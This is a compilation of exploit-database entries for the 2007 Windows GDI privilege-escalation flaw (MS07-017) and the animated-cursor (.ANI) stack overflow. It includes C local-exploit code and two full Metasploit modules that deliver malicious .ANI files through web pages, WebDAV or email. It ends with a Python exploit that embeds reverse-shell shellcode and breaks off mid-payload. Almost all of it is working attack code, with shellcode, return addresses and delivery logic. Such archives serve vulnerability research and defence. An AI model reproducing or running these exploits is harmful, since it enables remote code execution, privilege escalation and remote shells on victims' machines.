gdiTable->pUserInfo); Old=gdiTable->pKernelInfo; gdiTable->pKernelInfo=(ULONG)buff; //crafted buff break; } gdiTable++; } if(!DeleteObject(hBr)) printf("Error with DeleteObject : %d\n", GetLastError()); else printf("Done\n"); printf("Buff : 0x%x\n", buff); memset(buff, 0x90, sizeof(buff)); buff[0]=0x1; //!=0 buff[0x24/4]=Win32kSST; //syscall to modifY buff[0x4C/4]=0x804D7000; //kernel base, just for avoiding bad mem ptr if(!DeleteObject(hBr)) printf("Error with DeleteObject : %d\n", GetLastError()); gdiTable->pKernelInfo=Old; //restore old value /* lkd> uf GDI32!NtGdiAbortDoc GDI32!NtGdiAbortDoc: 77f3073a b800100000 mov eax,1000h 77f3073f ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300) 77f30744 ff12 call dword ptr [edx] 77f30746 c20400 ret 4 */ __asm { mov eax, 0x1000 mov edx,0x7ffe0300 call dword ptr [edx] } return 0; } // milw0rm.com [2007-04-08]

/* GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017) Coded by Lionel d'Hauenens http://www.labo-asso.com Development: ------------ Dev-C++ 4.9.9.2 Linked with /lib/libgdi32.a References: ----------- http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx http://research.eeye.com/html/alerts/zeroday/20061106.html http://www.milw0rm.com/exploits/3688 http://ivanlef0u.free.fr/?p=41 March 16, 2007 */ #include <stdio.h> #include <stdlib.h> #include <windows.h> typedef enum _SECTION_INFORMATION_CLASS { SectionBasicInformation, SectionImageInformation } SECTION_INFORMATION_CLASS; typedef struct _SECTION_BASIC_INFORMATION { ULONG Base; ULONG Attributes; LARGE_INTEGER Size; } SECTION_BASIC_INFORMATION; typedef struct _GDI_TABLE_ENTRY { PVOID pKernelInfo; WORD ProcessID; WORD _nCount; WORD nUpper; BYTE nType; BYTE flags; PVOID pUserInfo; } GDI_TABLE_ENTRY, *PGDI_TABLE_ENTRY; typedef DWORD (WINAPI* NTQUERYSECTION)(HANDLE, ULONG, PVOID,ULONG,PULONG); NTQUERYSECTION NtQuerySection; #define INT3 asm (".intel_syntax noprefix"); __asm ("int 3"); asm (".att_syntax noprefix"); #define STATUS_SUCCESS 0 #define PAL_TYPE 8 DWORD flag_test; hook (HANDLE pal, COLORREF couleur) { // INT3 // Executed code with kernel privilege asm (".intel_syntax noprefix"); __asm ("cli"); // it's the fiesta !!! :) __asm ("sti"); asm (".att_syntax noprefix"); flag_test = 1; return (TRUE); } int main(int argc, char *argv[]) { SECTION_BASIC_INFORMATION SectionInfo; PGDI_TABLE_ENTRY pGdiEntry; PLOGPALETTE pLogPal; HANDLE hPal; PVOID OriginalPalObject; PVOID FalsePalObject; HANDLE hThread = GetCurrentThread(); DWORD OriginalThreadPriotity = GetThreadPriority (hThread); HANDLE hSection = (ULONG)0; PVOID MapFile = 0; HANDLE hProcess = (HANDLE)0xFFFFFFFF; WORD Pid = GetCurrentProcessId(); NtQuerySection = (NTQUERYSECTION)GetProcAddress(LoadLibrary( "ntdll.dll"),"NtQuerySection"); printf ("##########################################################\n"); printf ("# GDI Local Elevation of Privilege Vulnerability Exploit #\n"); printf ("# All Windows 2000/XP before MS07-017 patch #\n"); printf ("##########################################################\n"); printf ("# coded by Lionel d'Hauenens http://www.labo-asso.com #\n"); printf ("##########################################################\n\n"); // Search handle section and mapper in virtual memory of user while ((DWORD)hSection<0xFFFF) { SectionInfo.Attributes = 0; MapFile = MapViewOfFile((HANDLE)hSection, FILE_MAP_ALL_ACCESS, 0, 0, 0); if (MapFile) { NtQuerySection((HANDLE)hSection,0,&SectionInfo,sizeof(SectionInfo),0); if (SectionInfo.Attributes == SEC_COMMIT) break; // For compatibility with win2k UnmapViewOfFile(MapFile); MapFile = 0; } hSection++; } if (!MapFile) { printf ("Could not found shared section !\n"); exit(0); } // Create Palette pLogPal = (PLOGPALETTE) calloc (sizeof(LOGPALETTE)+sizeof(PALETTEENTRY), 1); pLogPal->palNumEntries = 1; pLogPal->palVersion = 0x300; hPal = (HANDLE)CreatePalette(pLogPal); if (!hPal) { printf ("Could not create palette !\n"); exit(0); } // Search the entry of pal object OriginalPalObject = (PVOID)0; pGdiEntry = (PGDI_TABLE_ENTRY)MapFile; while ((DWORD)pGdiEntry < ((DWORD)MapFile) + SectionInfo.Size.QuadPart) { if ( pGdiEntry->ProcessID == Pid && pGdiEntry->nType == PAL_TYPE ) { // Save original pointer OriginalPalObject = (PVOID)pGdiEntry->pKernelInfo; break; } pGdiEntry++; } if (!OriginalPalObject) { printf ("Could not find entry of Pal object !\n"); exit(0); } // Create the false Pal object FalsePalObject = (PVOID) calloc(0x100/4,4); ((PDWORD)FalsePalObject)[0] = (DWORD)hPal; // Handle ((PDWORD)FalsePalObject)[0x14/4] = (DWORD) 1; // Availabled flag ((PVOID*)FalsePalObject)[0x3C/4] = (PVOID) &hook; // Interface GetNearestPaletteIndex printf ("Section:\n--------\n"); printf ("Handle: 0x%08X Attributes: %08X Size: 0x%08X\n\n", hSection , SectionInfo.Attributes , SectionInfo.Size.QuadPart); printf ("Pointer of original pal object: 0x%08X\n", OriginalPalObject); printf ("Address of user map: 0x%08X\n", MapFile); printf ("Pointer of false pal object: 0x%08X\n", FalsePalObject); printf ("Entry of GDI palette in user view: 0x%08X\n", MapFile+((((ULONG)hPal) & 0xFFFF)*sizeof(GDI_TABLE_ENTRY)) ); printf ("Address of Hook(): 0x%08X\n\n", &hook); ////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////// printf ("->Test..."); flag_test = 0; SetThreadPriority (hThread, THREAD_PRIORITY_HIGHEST); // Active false Pal object pGdiEntry->pKernelInfo = FalsePalObject; GetNearestPaletteIndex (hPal, 0); //--> call hook() with kernel privilege :); // Restore original Pal object pGdiEntry->pKernelInfo = OriginalPalObject; SetThreadPriority (hThread,OriginalThreadPriotity); ////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////// if (!flag_test) printf ("ERROR !!!\n"); else printf ("OK :)\n"); UnmapViewOfFile(MapFile); DeleteObject ((HANDLE)hPal); free((PVOID)pLogPal); free((PVOID)FalsePalObject); system("PAUSE"); return (0); } // milw0rm.com [2007-04-17]

MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017) https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip) # milw0rm.com [2007-04-26]

## # $Id: ms07_017_ani_loadimage_chunksize.rb 9984 2010-08-12 16:56:41Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RIFF def initialize(info = {}) super(update_info(info, 'Name' => 'Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)', 'Description' => %q{ This module exploits a buffer overflow vulnerability in the LoadAniIcon() function in USER32.dll. The flaw can be triggered through Internet Explorer 6 and 7 by using the CURSOR style sheet directive to load a malicious .ANI file. The module can also exploit Mozilla Firefox by using a UNC path in a moz-icon URL and serving the .ANI file over WebDAV. The vulnerable code in USER32.dll will catch any exceptions that occur while the invalid cursor is loaded, causing the exploit to silently fail when the wrong target has been chosen. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee. }, 'Author' => [ 'hdm', # First version 'skape', # Vista support # Firefox support, OS language independence, improved reliability 'Solar Eclipse <solareclipse@phreedom.org>' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9984 $', 'References' => [ ['CVE', '2007-0038'], ['OSVDB', '33629'], ['BID', '23194'], ['MSB', 'MS07-017'], ['URL', 'http://www.microsoft.com/technet/security/advisory/935423.mspx'], ['URL', 'http://www.determina.com/security.research/vulnerabilities/ani-header.html'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024 + (rand(1000)), 'Compat' => { 'ConnectionType' => '-find', } }, 'Platform' => 'win', # Automatic target tested on: # # Windows NT SP6 + IE6 SP1 # Windows 2000 SP4 + IE6 SP1 # Windows 2000 SP4 UR1 + IE6 SP1 # Windows XP SP0 # Windows XP SP1 # Windows XP SP2 # Windows XP SP2 + IE7 # Windows 2003 SP0 # Windows 2003 SP1 # Windows 2003 SP1 + IE7 # Windows Vista # # Windows XP SP0 + Firebird 0.7 # Windows XP SP0 + Firefox 1.0 # Windows XP SP0 + Firefox 1.5 # Windows XP SP2 + Firefox 2.0 # Windows 2003 SP1 + Firefox 2.0 # Windows Vista + Firefox 2.0 'Targets' => [ [ '(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista', { 'Method' => 'automatic' } ], [ 'IE6 on Windows NT, 2000, XP, 2003 (all languages)', { 'Method' => 'jmpesp', 'Ret1' => 0x0040afff, # jmp esp on NT, 2000, XP, 2003 SP0 (iexplore.exe) 'Ret2' => 0x004090df # jmp esp on 2003 SP1, SP2 (iexplore.exe) } ], [ 'IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)', { 'Method' => 'jmpesp', 'Ret1' => 0x00420B45, # jmp esp on XP SP2 (iexplore.exe) 'Ret2' => 0x00420B45 # jmp esp on 2003 SP1, SP2 (iexplore.exe) } ], [ 'IE7 and Firefox on Windows Vista (all languages)', { 'Method' => 'partial', 'Ret' => 0x700B # we change user32.dll+5879 to user32.dll+700B (jmp [ebx] in user32.dll) } ], [ 'Firefox on Windows XP (English)', { 'Method' => 'jmpesp', 'Ret1' => 0x77059E48, # jmp esp on XP (comres.dll) 'Ret2' => 0x77019668 # jmp esp on 2003 SP1, SP2 (comres.dll) } ], [ 'Firefox on Windows 2003 (English)', { 'Method' => 'jmpesp', 'Ret1' => 0x77019668, # jmp esp on 2003 SP0 (comres.dll) 'Ret2' => 0x77019668 # jmp esp on 2003 SP1, SP2 (comres.dll) } ], ], 'DisclosureDate' => 'Mar 28 2007', 'DefaultTarget' => 0)) register_options( [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]), OptString.new('URIPATH', [ true, "The URI to use.", "/" ]) ], self.class) end # # Handle HTTP requests # def on_request_uri(cli, request) # # Automatic browser and OS detection # print_status("Attempting to exploit ani_loadimage_chunksize") browser = '' if target['Method'] == 'automatic' agent = request.headers['User-Agent'] # Check for Firefox requests if agent =~ /(Gecko|Microsoft-WebDAV-MiniRedir)/ browser = 'Mozilla' # WebDAV requires that we use port 80 and the URIPATH is '/' if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' print_status("Mozilla request received from #{cli.peerhost}. To exploit Mozilla browsers, SRVPORT must be set to 80 and URIPATH must be '/'") cli.send_response(create_response(404, "File not found")) return end if agent =~ /(Windows NT 6\.0|MiniRedir\/6\.0)/ target = targets[3] # Firefox on Vista elsif agent =~ /(Windows NT 5\.1|MiniRedir\/5\.1)/ target = targets[4] # Firefox on XP elsif agent =~ /(Windows NT 5\.2|MiniRedir\/5\.2)/ target = targets[5] # Firefox on 2003 else print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") return end # Check for MSIE requests elsif agent =~ /MSIE/ browser = 'IE' if agent =~ /Windows NT 6\.0/ target = targets[3] # IE7 on Vista elsif agent =~ /MSIE 7\.0/ target = targets[2] # IE7 on XP and 2003 elsif agent =~ /MSIE 6\.0/ target = targets[1] # IE6 on NT, 2000, XP and 2003 else print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") return end # Unknown user agent else print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") return end end # # Find out if this is a request for an ANI file # # Mozilla always uses a .ani extension, but IE randomly picks one of the # other extensions for the ANI request exts = ['bmp', 'wav', 'png', 'zip', 'tar', 'ani'] ani_request = false match = /\.(...)$/.match(request.uri) if match and exts.include?(match[1]) ani_request = true end # # OPTIONS and PROPFIND requests sent by the WebDav Mini-Redirector # if request.method == 'OPTIONS' print_status("Received WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}") headers = { 'DASL' => '<DAV:sql>', 'DAV' => '1, 2', 'Public' => 'OPTIONS, GET, PROPFIND', 'Allow' => 'OPTIONS, GET, PROPFIND' } send_response(cli, '', headers) return end if request.method == 'PROPFIND' print_status("Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport}") body = '' if (not ani_request) # Response for directories body = '<?xml version="1.0"?><a:multistatus xmlns:a="DAV:"><a:response><a:propstat><a:prop><a:resourcetype><a:collection/></a:resourcetype></a:prop></a:propstat></a:response></a:multistatus>' else # Response for files body = '<?xml version="1.0"?><a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:"><a:response></a:response></a:multistatus>' end send_response(cli, body, {'Content-Type' => 'text/xml'}) return end # # HTML requests sent by IE and Firefox # if (not ani_request) # Pick a random extension to use when we generate HTML. The moz-icon URL # must have a .ani extension, but we can use a random one for IE exts.delete('ani') ext = exts[rand(exts.length)] # Generate the HTML html = "<html>" + "<head><title>" + random_padding + "</title></head>" + "<body>" + random_padding + (browser == 'IE' ? generate_ie_html(ext) : generate_mozilla_html) + random_padding + "</body>" + "</html>" print_status("Sending HTML page to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html) return end # # ANI requests sent by IE and the WebDav Mini-Redirector # # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the compressed response to the client send_response(cli, generate_ani(p, target), { 'Content-Type' => 'application/octet-stream' }) end # # Generate a <div> element with a style attribute referencing the ANI file # def generate_ie_html(ext) path = get_resource.sub(/\/$/, '') "<div style='" + random_css_padding + Rex::Text.to_rand_case("cursor") + random_css_padding + ":" + random_css_padding + Rex::Text.to_rand_case("url(") + random_css_padding + '"' + path + '/' + rand_text_alphanumeric(rand(80)+16) + '.' + ext + '"' + random_css_padding + ");" + random_css_padding + "'>" + random_padding + "</div>" end # # Generate a img tag with a moz-icon URL referencing the ANI file # def generate_mozilla_html path = get_resource.gsub(/\/$/, '') # The UNC path of the ANI file must have at least one directory level, # otherwise the WebDAV redirector will not work if path == '' path = '/' + rand_text_alphanumeric(rand(80)+16) end return '<img src="moz-icon:file://///' + datastore['SRVHOST'] + path + '/' + rand_text_alphanumeric(rand(80)+16) + '.ani">' end # # Generate CSS padding # def random_css_padding buf = random_whitespace + "/*" + random_whitespace + random_padding + random_whitespace + "*/" + random_whitespace end # # Generate random whitespace # def random_whitespace len = rand(100)+2 set = "\x09\x20\x0d\x0a" buf = '' while (buf.length < len) buf << set[rand(set.length)].chr end buf end # # Generate random padding # def random_padding rand_text_alphanumeric(rand(128)+4) end # # Generate an ANI file that will trigger the vulnerability # def generate_ani(payload, target) # Valid ANI header header = [ 36, # cbSizeOf (must be 36) rand(128)+16, # cFrames (must be > 1 and < 0x10000) rand(1024)+1, # cSteps (must be < 0x10000) 0, 0, # cx, cy 0, # cBitCount 0, # cPlanes 0, # JifRate 1 # Flags (must have the LSB bit set) ].pack('V9') overflow = '' if target['Method'] == 'jmpesp' # ANI header that triggers the overflow: overflow = # 36 bytes of fake header # When we get control, the ebx and esi registers have the following values: # # 2000, XP, 2003 before MS05-002 # ebx = 0, esi = pointer to MappedFile struct # # NT before MS05-002 # ebx = pointer to dword 1, esi = pointer to MappedFile struct # # all versions after MS05-002, including XP SP2 and 2003 SP1 # ebx = pointer to MappedFile struct # # The first field in MappedFile is a pointer to the ANI file "\x85\xDB" + # test ebx,ebx "\x74\x0A" + # jz jmp_esi 2000, XP, 2003 before MS05-002 "\x81\x3B\x01\x00\x00\x00" + # cmp dword [ebx], 0x1 "\x74\x02" + # jz jmp_esi NT before MS05-002 "\x89\xDE" + # mov esi, ebx all versions after MS05-002 # jmp_esi: "\x8B\x36" + # mov esi,[esi] pointer to ANI file "\x81\x3E\x52\x49\x46\x46" + # cmp [esi], 'RIFF' "\x75\x02" + # jnz failed "\xFF\xE6" + # jmp esi # failed: "\x31\xc0" + # xor eax, eax "\x8b\x00" + # mov eax, [0] exit via SEH rand_text(2) + "\x00\x00\x00\x00" + # header flags (LSB bit must be set to 0) # end of header rand_text(4*6) + # local variables # The following local variables must be NULL to avoid calls to # HeapFree and NtUserDestroyCursor # 2000, XP, 2003 SP0 2003 SP1 "\x00\x00\x00\x00" + # var_10 "\x00\x00\x00\x00" + # var_C "\x00\x00\x00\x00" + # var_C "\x00\x00\x00\x00" + # var_8 "\x00\x00\x00\x00" + # var_4 [ target['Ret1'], # return address for NT, 2000, XP and 2003 SP0 target['Ret2'] # return address for 2003 SP1 ].pack('VV') + rand_text(4*4) + # function arguments "\x90\x90\x90\x90" + # jmp esp on NT, 2000, XP and 2003 SP0 lands # here, 2003 SP1 lands on the next dword "\xeb\x92" # jump back to the shellcode in the ANI header elsif target['Method'] == 'partial' # ANI header that triggers the overflow: overflow = # 36 bytes of fake header rand_text(32) + "\x00\x00\x00\x00" + # header flags (LSB bit must be set to 0) # end of header rand_text(4*8) + # local variables # The following local variables must be NULL to avoid calls to # HeapFree and NtUserDestroyCursor on Vista "\x00\x00\x00\x00" + # var_C "\x00\x00\x00\x00" + # var_8 "\x00\x00\x00\x00" + # var_4 rand_text(4) + # saved ebp [ target['Ret'], # 2 byte partial overwrite of the return address ].pack('v') else raise "Unknown target #{targetr['Method']}" end # Build the ANI file # The shellcode execution begins at the RIFF signature: # # 'R' 52 push edx # 'I' 49 dec ecx # 'F' 46 inc esi # 'F' 46 inc esi # eb 3a jmp +3a # jmp to the code in the payload chunk ani = "RIFF" + "\xeb\x3a\x00\x00" + "ACON" + riff_chunk("anih", header) + # payload chunk riff_chunk(random_riff_tag, Rex::Arch::X86.copy_to_stack(payload.encoded.length) + payload.encoded) + random_riff_chunks + # the second anih chunk trigger the overflow riff_chunk("anih", overflow) + random_riff_chunks return ani end end

## # $Id: ms07_017_ani_loadimage_chunksize.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # # This module sends email messages via smtp # include Msf::Exploit::Remote::SMTPDeliver def initialize(info = {}) super(update_info(info, 'Name' => 'Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)', 'Description' => %q{ This module exploits a buffer overflow vulnerability in the LoadAniIcon() function of USER32.dll. The flaw is triggered through Outlook Express by using the CURSOR style sheet directive to load a malicious .ANI file. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee. }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm', # First version 'skape', # Vista support ], 'Version' => '$Revision: 10394 $', 'References' => [ ['MSB', 'MS07-017'], ['CVE', '2007-0038'], ['CVE', '2007-1765'], ['OSVDB', '33629'], ['BID', '23194'], ['URL', 'http://www.microsoft.com/technet/security/advisory/935423.mspx'], ['URL', 'http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp'], ['URL', 'http://www.determina.com/security.research/vulnerabilities/ani-header.html'], ], 'Stance' => Msf::Exploit::Stance::Passive, 'DefaultOptions' => { # Cause internet explorer to exit after the code hits 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024 + (rand(1000)), 'MinNops' => 32, 'Compat' => { 'ConnectionType' => '-bind -find', }, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ # # Use multiple cursor URLs to try all targets. This can result in # multiple, sequential sessions # [ 'Automatic', {} ], # # The following targets use call [ebx+4], just like the original exploit # # Partial overwrite doesn't work for Outlook Express [ 'Windows XP SP2 user32.dll 5.1.2600.2622', { 'Ret' => 0x25ba, 'Len' => 2 }], # Should work for all English XP SP2 [ 'Windows XP SP2 userenv.dll English', { 'Ret' => 0x769fc81a }], # Supplied by Fabrice MOURRON <fab[at]revhosts.net> [ 'Windows XP SP2 userenv.dll French', { 'Ret' => 0x7699c81a }], # Should work for English XP SP0/SP1 [ 'Windows XP SP0/SP1 netui2.dll English', { 'Ret' => 0x71bd0205 }], # Should work for English 2000 SP0-SP4+ [ 'Windows 2000 SP0-SP4 netui2.dll English', { 'Ret' => 0x75116d88 }], # # Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start # of the RIFF chunk itself. The length field of the RIFF chunk # tag contains a short jump into an embedded riff chunk that # makes a long relative jump into the actual payload. # [ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2, # On Vista, the pages that contain the RIFF are read-only. # In-place decoders cannot be used. 'Payload' => { 'EncoderType' => Msf::Encoder::Type::Raw } } ], # # Supplied by ramon[at]risesecurity.org # # call [ebx+4] [ 'Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language', { 'Ret' => 0x25d0, 'Len' => 2 }], [ 'Windows XP SP2 user32.dll (5.1.2600.2180) English', { 'Ret' => 0x77d825d0 }], [ 'Windows XP SP2 userenv.dll Portuguese (Brazil)', { 'Ret' => 0x769dc81a }], # call [esi+4] [ 'Windows XP SP1a userenv.dll English', { 'Ret' => 0x75a758b1 }], [ 'Windows XP SP1a shell32.dll English', { 'Ret' => 0x77441a66 }] ], 'DisclosureDate' => 'Mar 28 2007', 'DefaultTarget' => 0)) end def autofilter false end def exploit exts = ['bmp', 'wav', 'png', 'zip', 'tar'] gext = exts[rand(exts.length)] name = rand_text_alpha(rand(10)+1) + ".#{gext}" anis = {} html = "<html><head><title>" + rand_text_alphanumeric(rand(128)+4) + "</title>" + "</head><body>" + rand_text_alphanumeric(rand(128)+1) mytargs = (target.name =~ /Automatic/) ? targets : [target] if target.name =~ /Automatic/ targets.each_index { |i| next if not targets[i].ret acid = generate_cid html << generate_div("cid:#{acid}") # Re-generate the payload, using the explicit target return if ((p = regenerate_payload(nil, nil, targets[i])) == nil) # Generate an ANI file for this target anis[acid] = generate_ani(p, targets[i]) } else acid = generate_cid html << generate_div("cid:#{acid}") # Re-generate the payload, using the explicit target return if ((p = regenerate_payload(nil, nil, target)) == nil) # Generate an ANI file for this target anis[acid] = generate_ani(p, target) end html << "</body></html>" msg = Rex::MIME::Message.new msg.mime_defaults msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1) msg.to = datastore['MAILTO'] msg.from = datastore['MAILFROM'] msg.add_part(Rex::Text.encode_base64(html, "\r\n"), "text/html", "base64", "inline") anis.each_pair do |cid,ani| part = msg.add_part_attachment(ani, cid + "." + gext) part.header.set("Content-ID", "<"+cid+">") end send_message(msg.to_s) print_status("Waiting for a payload session (backgrounding)...") end def generate_cid rand_text_alphanumeric(32)+'@'+rand_text_alphanumeric(8) end def generate_div(url) "<div style='" + generate_css_padding() + Rex::Text.to_rand_case("cursor") + generate_css_padding() + ":" + generate_css_padding() + Rex::Text.to_rand_case("url(") + generate_css_padding() + "\"#{url}\"" + generate_css_padding() + ");" + generate_css_padding() + "'>" + generate_padding() + "</div>" end def generate_ani(payload, target) # Build the first ANI header anih_a = [ 36, # DWORD cbSizeof rand(128)+16, # DWORD cFrames rand(1024)+1, # DWORD cSteps 0, # DWORD cx,cy (reserved - 0) 0, # DWORD cBitCount, cPlanes (reserved - 0) 0, 0, 0, # JIF jifRate 1 # DWORD flags ].pack('V9') anih_b = nil if (target.name =~ /Vista/) # Vista has ebp=80, eip=84 anih_b = rand_text(84) # Patch local variables and loop counters anih_b[68, 12] = [0].pack("V") * 3 else # XP/2K has ebp=76 and eip=80 anih_b = rand_text(80) # Patch local variables and loop counters anih_b[64, 12] = [0].pack("V") * 3 end # Overwrite the return with address of a "call ptr [ebx+4]" anih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4] # Begin the ANI chunk riff = "ACON" # Calculate the data offset for the trampoline chunk and add # the trampoline chunk if we're attacking Vista if target.name =~ /Vista/ trampoline_doffset = riff.length + 8 riff << generate_trampoline_riff_chunk end # Insert random RIFF chunks 0.upto(rand(128)+16) do |i| riff << generate_riff_chunk() end # Embed the first ANI header riff << "anih" + [anih_a.length].pack('V') + anih_a # Insert random RIFF chunks 0.upto(rand(128)+16) do |i| riff << generate_riff_chunk() end # Trigger the return address overwrite riff << "anih" + [anih_b.length].pack('V') + anih_b # If this is a Vista target, then we need to align the length of the # RIFF chunk so that the low order two bytes are equal to a jmp $+0x16 if target.name =~ /Vista/ plen = (riff.length & 0xffff0000) | 0x0eeb plen += 0x10000 if (plen - 8) < riff.length riff << generate_riff_chunk((plen - 8) - riff.length) # Replace the operand to the relative jump to point into the actual # payload itself which comes after the riff chunk riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 5].pack('V') end # Place the RIFF chunk in front and off we go ret = "RIFF" + [riff.length].pack('V') + riff # We copy the encoded payload to the stack because sometimes the RIFF # image is mapped in read-only pages. This would prevent in-place # decoders from working, and we can't have that. ret << Rex::Arch::X86.copy_to_stack(payload.encoded.length) # Place the real payload right after it. ret << payload.encoded ret end # Generates a riff chunk with the first bytes of the data being a relative # jump. This is used to bounce to the actual payload def generate_trampoline_riff_chunk tag = Rex::Text.to_rand_case(rand_text_alpha(4)) dat = "\xe9\xff\xff\xff\xff" + rand_text(1) + (rand_text(rand(256)+1) * 2) tag + [dat.length].pack('V') + dat end def generate_riff_chunk(len = (rand(256)+1) * 2) tag = Rex::Text.to_rand_case(rand_text_alpha(4)) dat = rand_text(len) tag + [dat.length].pack('V') + dat end def generate_css_padding buf = generate_whitespace() + "/*" + generate_whitespace() + generate_padding() + generate_whitespace() + "*/" + generate_whitespace() end def generate_whitespace len = rand(100)+2 set = "\x09\x20\x0d\x0a" buf = '' while (buf.length < len) buf << set[rand(set.length)].chr end buf end def generate_padding rand_text_alphanumeric(rand(128)+4) end end

..::[ jamikazu presents ]::.. Windows Animated Cursor Handling Exploit (0day) (Version3) Works on fully patched Windows Vista I think it is first real remote code execution exploit on vista =) Tested on: Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled) Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled) Windows XP SP2 (It also must to work on all nt based windows but not tested) Update: It also bypass eeye security ani patch! Author: jamikazu Mail: jamikazu@gmail.com Bug discovered by determina (http://www.determina.com) Credit: milw0rm,metasploit, SkyLined, http://doctus.net/ invokes calc.exe if successful https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3636.zip (04012007-exp.zip) # milw0rm.com [2007-04-01]

#-------------------------------------------------------------------------------- # Info: .ANI (RIFF Cursors) 2007 universal exploit generator # Tested on MS Internet Explorer 6.x-7.x, Windows XP SP2, Windows Vista # Author: Yag Kohha <skyhole [at] gmail.com> # 10x`n`Gr33tz 2: # Jamikazu, Skylined (pretty good t-short on BH07 Europe - L00k like skylined, skylined, skylined) # H.D. Moor and metasploit project # Kumar Brothers (tnx for Vista patch live show at BH07 Europe), # Alexander Sotirov (tnx for "Heap Feng Shui" live show at BH07 Europe), str0ke # Microsoft for great coding and Amsterdam (BH07 Europe) party #-------------------------------------------------------------------------------- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3651.tar.gz (04032007-ie_ani.tar.gz) # milw0rm.com [2007-04-03]

#!/usr/bin/env python # # $Id: win32-loadaniicon.py 4 2007-06-02 00:47:59Z ramon $ # # Windows Animated Cursor Stack Overflow Exploit # Copyright 2007 Ramon de Carvalho Valle <ramon@risesecurity.org>, # RISE Security <contact@risesecurity.org> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # # # Windows Animated Cursor Stack Overflow Vulnerability # http://www.determina.com/security.research/vulnerabilities/ani-header.html # from BaseHTTPServer import * from os.path import * from random import * from socket import * from string import * from struct import * from sys import * # # windows/shell_reverse_tcp - 287 bytes # http://www.metasploit.com # EXITFUNC=seh, LPORT=1234, LHOST=127.0.0.1 # buf = \ '\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b' + \ '\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01' + \ '\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07' + \ '\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f' + \ '\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b' + \ '\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c' + \ '\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff' + \ '\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0' + \ '\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08' + \ '\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53' + \ 